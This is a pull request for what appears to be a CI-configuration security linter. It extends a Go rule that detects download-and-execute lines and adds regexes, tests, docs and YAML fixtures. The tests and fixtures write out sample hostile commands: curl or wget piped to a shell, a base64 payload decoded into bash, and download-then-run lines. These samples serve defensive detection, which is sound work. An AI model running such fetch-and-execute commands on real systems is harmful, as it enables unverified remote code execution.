### PR TITLE
GL011: extend download-and-execute detection (inline base64, download-then-exec, redirect-then-exec)

### DIFF
--- a/docs/rules/GL011.md
+++ b/docs/rules/GL011.md
@@ -16,6 +16,11 @@ glsec flags script lines that download content with `curl` or `wget` and pipe it
 | Process substitution | `python3 <(curl URL)` |
 | Multi-stage pipe | `curl URL \| base64 -d \| bash` |
 | Command substitution | `bash -c "$(curl URL)"` |
+| Inline base64 payload | `echo "…" \| base64 -d \| bash` |
+| Download-then-execute | `curl URL -o f.sh && bash f.sh` |
+| Redirect-then-execute | `curl URL > f.sh; sh f.sh` |
+
+A line that also runs an integrity check (`sha256sum`, `sha512sum`, `shasum`, `gpg --verify`, `cosign verify`) is treated as verified and not flagged. Pipes or shell tokens that appear only inside a quoted string literal do not trigger.
 
 ## Trigger example
 
@@ -25,6 +30,9 @@ setup:
     - curl -sSL https://install.example.com/setup.sh | bash
     - wget -qO- https://raw.githubusercontent.com/org/repo/main/install.sh | sh
     - python3 <(curl -s https://example.com/bootstrap.py)
+    - echo "ZWNobyBwd25lZAo=" | base64 -d | bash
+    - curl -fsSL https://example.com/install.sh -o install.sh && bash install.sh
+    - curl -fsSL https://example.com/payload.sh > install.sh; sh install.sh
 ```
 
 ## Safe alternative

--- a/rules/gl011.go
+++ b/rules/gl011.go
@@ -15,15 +15,30 @@ var GL011 = &gl011{}
 
 func (r *gl011) ID() string { return "GL011" }
 
+const shellAlt = `bash|sh|python[23]?|ruby|perl|node`
+
 var (
 	// downloadToolRe matches curl or wget anywhere in a script line.
 	downloadToolRe = regexp.MustCompile(`\b(?:curl|wget)\b`)
 	// pipeToShellRe matches a pipe directly into a shell interpreter.
-	pipeToShellRe = regexp.MustCompile(`\|\s*(?:bash|sh|python[23]?|ruby|perl|node)\b`)
+	pipeToShellRe = regexp.MustCompile(`\|\s*(?:` + shellAlt + `)\b`)
 	// processSubstRe matches bash process substitution: <(curl ...) or <(wget ...).
 	processSubstRe = regexp.MustCompile(`<\s*\(\s*(?:curl|wget)\b`)
 	// cmdSubstRe matches command substitution passed to a shell: bash -c "$(curl ...)".
 	cmdSubstRe = regexp.MustCompile(`\b(?:bash|sh)\b.*\$\(\s*(?:curl|wget)\b`)
+	// base64ExecRe matches a base64-decode piped straight into a shell, e.g.
+	// echo "…" | base64 -d | bash — an inline-obfuscated payload with no download tool.
+	base64ExecRe = regexp.MustCompile(`\bbase64\s+(?:-d|--decode)\b.*\|\s*(?:` + shellAlt + `)\b`)
+	// downloadThenExecRe matches a download saved to a file and executed on the same
+	// line, e.g. curl … -o f && bash f, or curl … > f; sh f. The redirect alternative
+	// uses [^0-9&]> so stderr/merge redirects (2>, &>) do not count as a save-to-file.
+	downloadThenExecRe = regexp.MustCompile(`\b(?:curl|wget)\b.*(?:\s-o\b|\s--output\b|[^0-9&]>).*(?:;|&&)\s*(?:` + shellAlt + `)\s+\S`)
+	// checksumGuardRe matches an integrity check on the same line; its presence means
+	// the fetched code is verified before execution, so the line is not flagged.
+	checksumGuardRe = regexp.MustCompile(`\b(?:sha256sum|sha512sum|shasum)\b|\bgpg\b.*--verify\b|\bcosign\b.*\bverify\b`)
+	// quotedRe matches single- or double-quoted substrings, stripped before matching so
+	// a "| bash" inside a string literal does not trigger.
+	quotedRe = regexp.MustCompile(`"[^"]*"|'[^']*'`)
 )
 
 func (r *gl011) Check(doc *yaml.Node, file string) []finding.Finding {
@@ -81,13 +96,22 @@ func checkScriptDownloadExecute(node *yaml.Node, file string) []finding.Finding 
 }
 
 func isDownloadExecute(line string) bool {
-	if processSubstRe.MatchString(line) {
+	stripped := quotedRe.ReplaceAllString(line, "")
+	// An integrity check on the same line means the code is verified before running.
+	if checksumGuardRe.MatchString(stripped) {
+		return false
+	}
+	// Command/process substitution intentionally lives inside quotes, so match the raw line.
+	if processSubstRe.MatchString(line) || cmdSubstRe.MatchString(line) {
 		return true
 	}
-	if cmdSubstRe.MatchString(line) {
+	if downloadToolRe.MatchString(stripped) && pipeToShellRe.MatchString(stripped) {
 		return true
 	}
-	return downloadToolRe.MatchString(line) && pipeToShellRe.MatchString(line)
+	if base64ExecRe.MatchString(stripped) {
+		return true
+	}
+	return downloadThenExecRe.MatchString(stripped)
 }
 
 func truncate(s string, n int) string {

--- a/rules/gl011_test.go
+++ b/rules/gl011_test.go
@@ -96,6 +96,61 @@ setup:
 	}
 }
 
+func TestGL011_InlineBase64DecodeBash(t *testing.T) {
+	f := findings011(t, `
+setup:
+  script:
+    - echo "ZWNobyBwd25lZAo=" | base64 -d | bash
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding for echo | base64 -d | bash, got %d", len(f))
+	}
+}
+
+func TestGL011_DownloadThenExecAnd(t *testing.T) {
+	f := findings011(t, `
+setup:
+  script:
+    - curl -fsSL https://example.com/install.sh -o install.sh && bash install.sh
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding for curl -o file && bash file, got %d", len(f))
+	}
+}
+
+func TestGL011_RedirectThenExecSemicolon(t *testing.T) {
+	f := findings011(t, `
+setup:
+  script:
+    - curl -fsSL https://example.com/payload.sh > install.sh; sh install.sh
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding for curl > file; sh file, got %d", len(f))
+	}
+}
+
+func TestGL011_PipeInsideQuotedString_NoFinding(t *testing.T) {
+	f := findings011(t, `
+setup:
+  script:
+    - 'echo "to install run curl https://x.sh | bash yourself"'
+`)
+	if len(f) != 0 {
+		t.Errorf("expected no finding for | bash inside a quoted string, got %d", len(f))
+	}
+}
+
+func TestGL011_ChecksumVerifiedThenExec_NoFinding(t *testing.T) {
+	f := findings011(t, `
+setup:
+  script:
+    - curl -fsSL https://example.com/install.sh -o install.sh && sha256sum -c install.sh.sha256 && bash install.sh
+`)
+	if len(f) != 0 {
+		t.Errorf("expected no finding when checksum is verified before exec, got %d", len(f))
+	}
+}
+
 func TestGL011_CurlDownloadOnly_NoFinding(t *testing.T) {
 	f := findings011(t, `
 setup:

--- a/testdata/fixtures/gl011-curl-pipe-bash.yml
+++ b/testdata/fixtures/gl011-curl-pipe-bash.yml
@@ -8,6 +8,9 @@ setup:
   script:
     - curl -sSL https://install.example.com/setup.sh | bash
     - wget -qO- https://raw.example.com/install.sh | sh
+    - echo "ZWNobyBwd25lZAo=" | base64 -d | bash
+    - curl -fsSL https://example.com/install.sh -o install.sh && bash install.sh
+    - curl -fsSL https://example.com/payload.sh > install.sh; sh install.sh
 
 build:
   stage: build


### PR DESCRIPTION
Closes #279.

## What changed

Extends `isDownloadExecute` in `rules/gl011.go` to catch three download-and-execute patterns that previously slipped through, plus two false-positive guards.

New detections:
- **Inline base64 payload** — `echo "…" | base64 -d | bash`. `base64ExecRe` matches a base64-decode piped straight into a shell, even when no `curl`/`wget` appears on the line.
- **Download-then-execute** — `curl … -o install.sh && bash install.sh`. `downloadThenExecRe` matches a download saved to a file (`-o`/`--output`/`>`) and executed via `&&`/`;` on the same line.
- **Redirect-then-execute** — `curl … > install.sh; sh install.sh`. Same regex; the redirect alternative is written `[^0-9&]>` so stderr/merge redirects (`2>`, `&>`) are not mistaken for a save-to-file.

False-positive guards:
- **Quoted-string stripping** (`quotedRe`) — single/double-quoted substrings are removed before matching, so a `| bash` inside a string literal (e.g. an `echo` instruction) does not trigger. Command/process substitution (`bash -c "$(curl …)"`) is still matched against the raw line, since the payload there intentionally lives inside quotes.
- **Checksum guard** (`checksumGuardRe`) — a same-line integrity check (`sha256sum`, `sha512sum`, `shasum`, `gpg --verify`, `cosign verify`) marks the fetched code as verified and suppresses the finding.

The shell interpreter set (`bash|sh|python[23]?|ruby|perl|node`) is factored into a shared `shellAlt` const so all patterns stay in parity.

## Why

GL011 only flagged a download tool piped directly into a shell (plus `<(curl …)` and `bash -c "$(curl …)"`). Inline-obfuscated payloads and the save-then-run idioms (`&&`/`;`) were unverified RCE that the rule missed; GL020 caught some only from the integrity angle, not as code execution.

## How to test

- `go test ./rules/ -run TestGL011 -v` — 5 new cases (three violations + quoted-string guard + checksum-verified guard), all existing cases still pass.
- `go test ./...` — full suite incl. the rule-consistency test.
- `golangci-lint run ./...` — clean.
- `check-jsonschema --builtin-schema gitlab-ci testdata/fixtures/gl011-curl-pipe-bash.yml` — fixture is schema-valid.
- `go run ./cmd/glsec testdata/fixtures/gl011-curl-pipe-bash.yml` — the three new fixture lines each produce a GL011 finding.

Docs (`docs/rules/GL011.md`) and the fixture are updated with the new patterns and guard notes.